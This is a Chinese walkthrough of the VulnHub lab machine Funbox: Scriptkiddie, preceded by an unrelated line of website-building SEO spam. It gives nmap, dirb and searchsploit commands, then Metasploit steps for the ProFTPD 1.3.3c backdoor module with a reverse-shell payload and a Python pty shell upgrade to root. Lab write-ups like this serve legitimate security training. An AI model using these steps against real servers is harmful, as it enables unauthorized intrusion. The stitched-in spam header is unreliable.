有口碑的南通网站建设,网站建设与维护 目录,wordpress和织梦哪个更简单,asp.net制作的网站开发一、环境搭建
靶官网机下载地址#xff1a;Funbox: Scriptkiddie ~ VulnHub
百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9
二、信息收集
1.nmap命令扫描靶机
先用ifconfig查看kali的IP#xff0c;因为kali和靶机都是NAT模式下#xff0c;所以用 nmap 192.168…一、环境搭建
靶官网机下载地址Funbox: Scriptkiddie ~ VulnHub
百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9
二、信息收集
1.nmap命令扫描靶机
先用ifconfig查看kali的IP因为kali和靶机都是NAT模式下所以用 nmap 192.168.101.0/24 扫描得到靶机ip 再使用命令查看靶机开放的端口和协议nmap -sV -A 192.168.101.112 2.利用扫描到端口 1开放21、22、80等端口先访问80端口吧 2进行目录探测看看他有没有给我们一些提示dirb http://192.168.101.112
3发现利用WordPress网站这条路行不通 3.SearchSploit漏洞查找工具
1利用21端口在kali输入searchsploit ProFTPD 1.3.3c
发现可以利用的后门代码 三、渗透
msfconsole框架 1.搜索proFTPD 1.3.3c可利用的脚本search ProFTPD 1.3.3c 2.使用该脚本use exploit/unix/ftp/proftpd_133c_backdoor 3.查看需要设置的参数show options 4.设置RHOSTS(靶机):set RHOSTS 192.168.101.112 5.查看一下payloads的脚本:show payloads 使用反向6.链接的脚本:set payloads 3
查看要设置参数:show options 7.设置LHOST(攻击机): set LHOST 192.168.101.10 8.使用run开启攻击: 优化命令执行终端执行下面命令进入python交互式(注意要下载python环境才能运行):
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ 9.进入到root发现了一个flag文件
